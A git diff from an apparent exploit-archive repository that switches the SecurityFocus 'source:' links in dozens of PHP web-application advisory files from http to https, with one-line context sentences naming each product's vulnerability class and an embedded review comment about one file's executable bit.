diff --git a/exploits/php/webapps/28270.txt b/exploits/php/webapps/28270.txt index 1b2cd9ead..4a8ca4622 100644 --- a/exploits/php/webapps/28270.txt +++ b/exploits/php/webapps/28270.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19149/info +source: https://www.securityfocus.com/bid/19149/info LinksCaffe is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28273.txt b/exploits/php/webapps/28273.txt index aebb1eba3..d8397602c 100644 --- a/exploits/php/webapps/28273.txt +++ b/exploits/php/webapps/28273.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19151/info +source: https://www.securityfocus.com/bid/19151/info Savant2 is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28274.txt b/exploits/php/webapps/28274.txt index 01b2a0abe..320297cbd 100644 --- a/exploits/php/webapps/28274.txt +++ b/exploits/php/webapps/28274.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19158/info +source: https://www.securityfocus.com/bid/19158/info PHP Pro Bid is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28275.txt b/exploits/php/webapps/28275.txt index 01903e805..fc4c2e8bb 100644 --- a/exploits/php/webapps/28275.txt +++ b/exploits/php/webapps/28275.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19158/info +source: https://www.securityfocus.com/bid/19158/info PHP Pro Bid is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/28276.txt b/exploits/php/webapps/28276.txt index 50c27fc6b..004e63f2b 100644 --- a/exploits/php/webapps/28276.txt +++ b/exploits/php/webapps/28276.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19158/info +source: https://www.securityfocus.com/bid/19158/info PHP Pro Bid is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28280.txt b/exploits/php/webapps/28280.txt index d030c20df..64bb7bd21 100644 --- a/exploits/php/webapps/28280.txt +++ b/exploits/php/webapps/28280.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19177/info +source: https://www.securityfocus.com/bid/19177/info WWWThreads is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28281.txt b/exploits/php/webapps/28281.txt index 36805a3bf..e48d1974a 100644 --- a/exploits/php/webapps/28281.txt +++ b/exploits/php/webapps/28281.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19179/info +source: https://www.securityfocus.com/bid/19179/info PHPBB-Auction is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28282.txt b/exploits/php/webapps/28282.txt index dd3f5c338..48af9e520 100644 --- a/exploits/php/webapps/28282.txt +++ b/exploits/php/webapps/28282.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19179/info +source: https://www.securityfocus.com/bid/19179/info PHPBB-Auction is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28289.txt b/exploits/php/webapps/28289.txt index 4df72d43b..c18a8d287 100644 
--- a/exploits/php/webapps/28289.txt +++ b/exploits/php/webapps/28289.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19191/info +source: https://www.securityfocus.com/bid/19191/info Bosdates is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28291.txt b/exploits/php/webapps/28291.txt index 88649db39..5b6f12848 100644 --- a/exploits/php/webapps/28291.txt +++ b/exploits/php/webapps/28291.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19195/info +source: https://www.securityfocus.com/bid/19195/info MyBulletinBoard is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28292.txt b/exploits/php/webapps/28292.txt index 23cee6181..7e7e2aa61 100644 --- a/exploits/php/webapps/28292.txt +++ b/exploits/php/webapps/28292.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19196/info +source: https://www.securityfocus.com/bid/19196/info GeoClassifieds Enterprise is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28294.txt b/exploits/php/webapps/28294.txt index 71f74b2b2..3843fa5f2 100644 --- a/exploits/php/webapps/28294.txt +++ b/exploits/php/webapps/28294.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19208/info +source: https://www.securityfocus.com/bid/19208/info PHPNuke INP is prone to a cross-site scripting vulnerability that affects the 'modules.php' script. diff --git a/exploits/php/webapps/28295.txt b/exploits/php/webapps/28295.txt index 8f6cb47ea..4b8197ce0 100644 --- a/exploits/php/webapps/28295.txt +++ b/exploits/php/webapps/28295.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19209/info +source: https://www.securityfocus.com/bid/19209/info JD-WordPress for Joomla is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28296.txt b/exploits/php/webapps/28296.txt index 944f15948..e37b8a646 100644 --- a/exploits/php/webapps/28296.txt +++ b/exploits/php/webapps/28296.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19209/info +source: https://www.securityfocus.com/bid/19209/info JD-WordPress for Joomla is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28297.txt b/exploits/php/webapps/28297.txt index b00bb39f6..324f95aaa 100644 --- a/exploits/php/webapps/28297.txt +++ b/exploits/php/webapps/28297.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19209/info +source: https://www.securityfocus.com/bid/19209/info JD-WordPress for Joomla is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28302.txt b/exploits/php/webapps/28302.txt index 47a8b07ce..c4ad4527f 100644 --- a/exploits/php/webapps/28302.txt +++ b/exploits/php/webapps/28302.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19234/info +source: https://www.securityfocus.com/bid/19234/info Liga Manager Online Joomla! Component is prone to a remote file-include vulnerability. diff --git a/exploits/php/webapps/28303.txt b/exploits/php/webapps/28303.txt index 8c44ff918..f63cc7c11 100644 --- a/exploits/php/webapps/28303.txt +++ b/exploits/php/webapps/28303.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19235/info +source: https://www.securityfocus.com/bid/19235/info X-Protection is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28304.txt b/exploits/php/webapps/28304.txt index aaf07427b..7ccb46e50 100644 --- a/exploits/php/webapps/28304.txt +++ b/exploits/php/webapps/28304.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19236/info +source: https://www.securityfocus.com/bid/19236/info X-Poll is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28305.txt b/exploits/php/webapps/28305.txt index 1669cb7e5..c822ffd10 100644 --- a/exploits/php/webapps/28305.txt +++ b/exploits/php/webapps/28305.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19238/info +source: https://www.securityfocus.com/bid/19238/info AJAX Chat is prone to both a directory-traversal vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28306.txt b/exploits/php/webapps/28306.txt index 1a3b3508e..2d70a660c 100644 --- a/exploits/php/webapps/28306.txt +++ b/exploits/php/webapps/28306.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19240/info +source: https://www.securityfocus.com/bid/19240/info PHP MySQL Banner Exchange is prone to multiple SQL-injection vulnerabilities and a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28307.txt b/exploits/php/webapps/28307.txt index 4d693c263..d9842168d 100644 --- a/exploits/php/webapps/28307.txt +++ b/exploits/php/webapps/28307.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19240/info +source: https://www.securityfocus.com/bid/19240/info PHP MySQL Banner Exchange is prone to multiple SQL-injection vulnerabilities and a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28308.txt b/exploits/php/webapps/28308.txt index c4df13600..a2d0a0d2e 100644 --- a/exploits/php/webapps/28308.txt +++ b/exploits/php/webapps/28308.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19240/info +source: https://www.securityfocus.com/bid/19240/info PHP MySQL Banner Exchange is prone to multiple SQL-injection vulnerabilities and a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28309.txt b/exploits/php/webapps/28309.txt index 95ae11d4d..6939fd465 100644 --- a/exploits/php/webapps/28309.txt +++ b/exploits/php/webapps/28309.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19244/info +source: https://www.securityfocus.com/bid/19244/info Seir Anphin V666 Community Management System is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28310.txt b/exploits/php/webapps/28310.txt index 23dbb61d9..332771928 100644 --- a/exploits/php/webapps/28310.txt +++ b/exploits/php/webapps/28310.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19245/info +source: https://www.securityfocus.com/bid/19245/info Moskool is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28311.txt b/exploits/php/webapps/28311.txt index 077188f6f..da9704b5c 100644 --- a/exploits/php/webapps/28311.txt +++ b/exploits/php/webapps/28311.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19246/info +source: https://www.securityfocus.com/bid/19246/info myEvent is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28315.txt b/exploits/php/webapps/28315.txt index 9e6bcffc9..624c5fffc 100644 --- a/exploits/php/webapps/28315.txt +++ b/exploits/php/webapps/28315.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19256/info +source: https://www.securityfocus.com/bid/19256/info Help Center Live is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28316.txt b/exploits/php/webapps/28316.txt index 2773a3805..4822a56d9 100644 --- a/exploits/php/webapps/28316.txt +++ b/exploits/php/webapps/28316.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19260/info +source: https://www.securityfocus.com/bid/19260/info TinyPHPForum is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28317.txt b/exploits/php/webapps/28317.txt index 0e03e5415..a4753a86d 100644 --- a/exploits/php/webapps/28317.txt +++ b/exploits/php/webapps/28317.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19269/info +source: https://www.securityfocus.com/bid/19269/info WoW Roster is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28318.txt b/exploits/php/webapps/28318.txt index 2736e15dd..19d7eacc6 100644 --- a/exploits/php/webapps/28318.txt +++ b/exploits/php/webapps/28318.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19271/info +source: https://www.securityfocus.com/bid/19271/info Quickie is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/28319.txt b/exploits/php/webapps/28319.txt index 6f2d91473..aea42a285 100644 --- a/exploits/php/webapps/28319.txt +++ b/exploits/php/webapps/28319.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19272/info +source: https://www.securityfocus.com/bid/19272/info FAQ Script is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28320.txt b/exploits/php/webapps/28320.txt index d844c7afd..9cbd02ea3 100644 --- a/exploits/php/webapps/28320.txt +++ b/exploits/php/webapps/28320.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19274/info +source: https://www.securityfocus.com/bid/19274/info GuestBook is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28322.txt b/exploits/php/webapps/28322.txt index 1ec81a543..98200414b 100644 --- a/exploits/php/webapps/28322.txt +++ b/exploits/php/webapps/28322.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19278/info +source: https://www.securityfocus.com/bid/19278/info TinyPHPForum is prone to an information-disclosure vulnerability. This issue arises when a script allows a remote untrusted source to change a victim user's email address, and have their login credentials returned to an attacker. diff --git a/exploits/php/webapps/28323.txt b/exploits/php/webapps/28323.txt index 399e90072..bafd2a186 100644 --- a/exploits/php/webapps/28323.txt +++ b/exploits/php/webapps/28323.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19281/info +source: https://www.securityfocus.com/bid/19281/info TinyPHPForum is prone to an authentication-bypass vulnerability because it fails to prevent an attacker from accessing admin scripts directly without requiring authentication. diff --git a/exploits/php/webapps/28324.txt b/exploits/php/webapps/28324.txt index 73c6963f4..6239c2783 100644 
--- a/exploits/php/webapps/28324.txt +++ b/exploits/php/webapps/28324.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19308/info +source: https://www.securityfocus.com/bid/19308/info Blackboard products are prone to multiple HTML-injection vulnerabilities because the software fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/28326.txt b/exploits/php/webapps/28326.txt index d7df405f8..d65c82479 100644 --- a/exploits/php/webapps/28326.txt +++ b/exploits/php/webapps/28326.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19327/info +source: https://www.securityfocus.com/bid/19327/info Vwar is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. These issues occur because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28327.txt b/exploits/php/webapps/28327.txt index a972170a7..58ecbe614 100644 --- a/exploits/php/webapps/28327.txt +++ b/exploits/php/webapps/28327.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19327/info +source: https://www.securityfocus.com/bid/19327/info Vwar is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. These issues occur because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28342.txt b/exploits/php/webapps/28342.txt index 1b80708dd..fa1df1015 100644 --- a/exploits/php/webapps/28342.txt +++ b/exploits/php/webapps/28342.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19358/info +source: https://www.securityfocus.com/bid/19358/info vBulletin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28347.txt b/exploits/php/webapps/28347.txt index 2494947ab..776ca0670 100644 
--- a/exploits/php/webapps/28347.txt +++ b/exploits/php/webapps/28347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19374/info +source: https://www.securityfocus.com/bid/19374/info XennoBB is prone to multiple SQL injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28349.txt b/exploits/php/webapps/28349.txt index 356053135..ebb93576e 100644 --- a/exploits/php/webapps/28349.txt +++ b/exploits/php/webapps/28349.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19382/info +source: https://www.securityfocus.com/bid/19382/info PHP Simple Shop is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/28350.txt b/exploits/php/webapps/28350.txt index 5ec60895f..0f36bf667 100644 --- a/exploits/php/webapps/28350.txt +++ b/exploits/php/webapps/28350.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19387/info +source: https://www.securityfocus.com/bid/19387/info VWar is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28351.txt b/exploits/php/webapps/28351.txt index b4ad3217d..d6cc6838d 100644 --- a/exploits/php/webapps/28351.txt +++ b/exploits/php/webapps/28351.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19387/info +source: https://www.securityfocus.com/bid/19387/info VWar is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28352.txt b/exploits/php/webapps/28352.txt index 43f843aa5..916de2d02 100644 --- a/exploits/php/webapps/28352.txt +++ b/exploits/php/webapps/28352.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19387/info +source: https://www.securityfocus.com/bid/19387/info VWar is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28353.txt b/exploits/php/webapps/28353.txt index ffa9a9594..8e98736ae 100644 --- a/exploits/php/webapps/28353.txt +++ b/exploits/php/webapps/28353.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19387/info +source: https://www.securityfocus.com/bid/19387/info VWar is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28354.txt b/exploits/php/webapps/28354.txt index 4e0a9f207..8711b8ecf 100644 --- a/exploits/php/webapps/28354.txt +++ b/exploits/php/webapps/28354.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19387/info +source: https://www.securityfocus.com/bid/19387/info VWar is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28355.txt b/exploits/php/webapps/28355.txt index 3001c8818..f8ff0ef47 100644 --- a/exploits/php/webapps/28355.txt +++ b/exploits/php/webapps/28355.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19387/info +source: https://www.securityfocus.com/bid/19387/info VWar is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28356.txt b/exploits/php/webapps/28356.txt index 40a7827b1..f8a223bb4 100644 --- a/exploits/php/webapps/28356.txt +++ b/exploits/php/webapps/28356.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19387/info +source: https://www.securityfocus.com/bid/19387/info VWar is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28359.txt b/exploits/php/webapps/28359.txt index 108a370b7..e081d90f7 100644 --- a/exploits/php/webapps/28359.txt +++ b/exploits/php/webapps/28359.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19397/info +source: https://www.securityfocus.com/bid/19397/info phpPrintAnalyzer is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28362.txt b/exploits/php/webapps/28362.txt index 7b5bb1f3d..92380e899 100644 --- a/exploits/php/webapps/28362.txt +++ b/exploits/php/webapps/28362.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19437/info +source: https://www.securityfocus.com/bid/19437/info Simple one-file guestbook is prone to a security-bypass vulnerability. An attacker can bypass authentication measures by using a specific URL to delete all guestbook entries. diff --git a/exploits/php/webapps/28363.txt b/exploits/php/webapps/28363.txt index 50740a01d..df5625ff1 100644 --- a/exploits/php/webapps/28363.txt +++ b/exploits/php/webapps/28363.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19442/info +source: https://www.securityfocus.com/bid/19442/info CLUB-Nuke is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28364.txt b/exploits/php/webapps/28364.txt index 321d68312..75b23cc31 100644 --- a/exploits/php/webapps/28364.txt +++ b/exploits/php/webapps/28364.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19446/info +source: https://www.securityfocus.com/bid/19446/info XennoBB is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28366.txt b/exploits/php/webapps/28366.txt index 2b6b0a90f..59e21f14e 100644 --- a/exploits/php/webapps/28366.txt +++ b/exploits/php/webapps/28366.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19449/info +source: https://www.securityfocus.com/bid/19449/info MyBloggie is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28370.txt b/exploits/php/webapps/28370.txt index 0a01b2fa1..5187efa37 100644 --- a/exploits/php/webapps/28370.txt +++ b/exploits/php/webapps/28370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19458/info +source: https://www.securityfocus.com/bid/19458/info Mafia Moblog is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28371.txt b/exploits/php/webapps/28371.txt index d85c9707e..d7f8ebee9 100644 --- a/exploits/php/webapps/28371.txt +++ b/exploits/php/webapps/28371.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19460/info +source: https://www.securityfocus.com/bid/19460/info A cross-site scripting vulnerability affects YaBBSE because the application fails to properly sanitize user-supplied input before including it in dynamically generated web content. diff --git a/exploits/php/webapps/28372.txt b/exploits/php/webapps/28372.txt index b55dcd005..67c917229 100644 --- a/exploits/php/webapps/28372.txt +++ b/exploits/php/webapps/28372.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19462/info +source: https://www.securityfocus.com/bid/19462/info Tiny Web Gallery is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28378.txt b/exploits/php/webapps/28378.txt index d70c8de27..ba1948541 100644 --- a/exploits/php/webapps/28378.txt +++ b/exploits/php/webapps/28378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19476/info +source: https://www.securityfocus.com/bid/19476/info miniBloggie is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28379.txt b/exploits/php/webapps/28379.txt index e24140274..503fc48b9 100644 --- a/exploits/php/webapps/28379.txt +++ b/exploits/php/webapps/28379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19477/info +source: https://www.securityfocus.com/bid/19477/info WEBinsta Mailing List Manager is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28382.txt b/exploits/php/webapps/28382.txt index 059ce6d68..323e3a096 100644 --- a/exploits/php/webapps/28382.txt +++ b/exploits/php/webapps/28382.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19504/info +source: https://www.securityfocus.com/bid/19504/info WP-DB Backup For Wordpress is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28388.txt b/exploits/php/webapps/28388.txt index 72e33af77..9db17675a 100644 --- a/exploits/php/webapps/28388.txt +++ b/exploits/php/webapps/28388.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19525/info +source: https://www.securityfocus.com/bid/19525/info PHP-Nuke AutoHTML Module is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28390.txt b/exploits/php/webapps/28390.txt index d6c4ef09f..f53610191 100644 --- a/exploits/php/webapps/28390.txt +++ b/exploits/php/webapps/28390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19533/info +source: https://www.securityfocus.com/bid/19533/info Lizge is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28392.txt b/exploits/php/webapps/28392.txt index d62a1cc41..c51c51ef1 100644 --- a/exploits/php/webapps/28392.txt +++ b/exploits/php/webapps/28392.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19543/info +source: https://www.securityfocus.com/bid/19543/info Zen Cart is prone to multiple remote and local file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28394.pl b/exploits/php/webapps/28394.pl index 9eb1a5c29..a112e8c8e 100755 --- a/exploits/php/webapps/28394.pl +++ b/exploits/php/webapps/28394.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19546/info +source: https://www.securityfocus.com/bid/19546/info Fusion News is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28396.txt b/exploits/php/webapps/28396.txt index 21a5c02db..f4ea87648 100644 --- a/exploits/php/webapps/28396.txt +++ b/exploits/php/webapps/28396.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19553/info +source: https://www.securityfocus.com/bid/19553/info Reporter (a Mambo component) is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. 
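Review bot: in the 28394.pl hunk the file keeps mode 100755, yet line 1 (the `source:` header being rewritten) and the context line after it ("Fusion News is prone to a remote file-include vulnerability ...") are plain advisory prose, not Perl. Since the header is being touched anyway, consider dropping the executable bit on files that are stored as text with a prose header, so that the mode matches the content.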
diff --git a/exploits/php/webapps/28399.txt b/exploits/php/webapps/28399.txt index 95cdbaf57..7436a583d 100644 --- a/exploits/php/webapps/28399.txt +++ b/exploits/php/webapps/28399.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19563/info +source: https://www.securityfocus.com/bid/19563/info CubeCart is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28402.txt b/exploits/php/webapps/28402.txt index 661598ca5..a2ff1cc55 100644 --- a/exploits/php/webapps/28402.txt +++ b/exploits/php/webapps/28402.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19577/info +source: https://www.securityfocus.com/bid/19577/info Blog:CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28403.txt b/exploits/php/webapps/28403.txt index 4fb1aa38f..8ed62c741 100644 --- a/exploits/php/webapps/28403.txt +++ b/exploits/php/webapps/28403.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19584/info +source: https://www.securityfocus.com/bid/19584/info The lmtg_myhomepage component for Mambo is prone multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28404.txt b/exploits/php/webapps/28404.txt index 56e04aa67..6a50b9175 100644 --- a/exploits/php/webapps/28404.txt +++ b/exploits/php/webapps/28404.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19593/info +source: https://www.securityfocus.com/bid/19593/info The Mambo Rssxt component for Joomla and Mambo is prone multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28406.txt b/exploits/php/webapps/28406.txt index db8edd421..a2e845aa3 100644 
--- a/exploits/php/webapps/28406.txt +++ b/exploits/php/webapps/28406.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19606/info +source: https://www.securityfocus.com/bid/19606/info XennoBB is prone to an SQL-injection vulnerability that could allow an attacker to influence the structure or logic of SQL queries made by the application. diff --git a/exploits/php/webapps/28410.txt b/exploits/php/webapps/28410.txt index ed28a859f..4db58d50a 100644 --- a/exploits/php/webapps/28410.txt +++ b/exploits/php/webapps/28410.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19621/info +source: https://www.securityfocus.com/bid/19621/info The Mambo Display MOSBot Manager component is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28411.txt b/exploits/php/webapps/28411.txt index 2a8eabb74..fae110818 100644 --- a/exploits/php/webapps/28411.txt +++ b/exploits/php/webapps/28411.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19622/info +source: https://www.securityfocus.com/bid/19622/info Multiple cross-site scripting vulnerabilities affect Job Site because the application fails to properly sanitize user-supplied input before including it in dynamically generated web content. diff --git a/exploits/php/webapps/28412.txt b/exploits/php/webapps/28412.txt index 01a6f9151..ed9c4a333 100644 --- a/exploits/php/webapps/28412.txt +++ b/exploits/php/webapps/28412.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19623/info +source: https://www.securityfocus.com/bid/19623/info DieselPay is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28413.txt b/exploits/php/webapps/28413.txt index 1c2d6d6c0..0c8b838c5 100644 --- a/exploits/php/webapps/28413.txt +++ b/exploits/php/webapps/28413.txt 
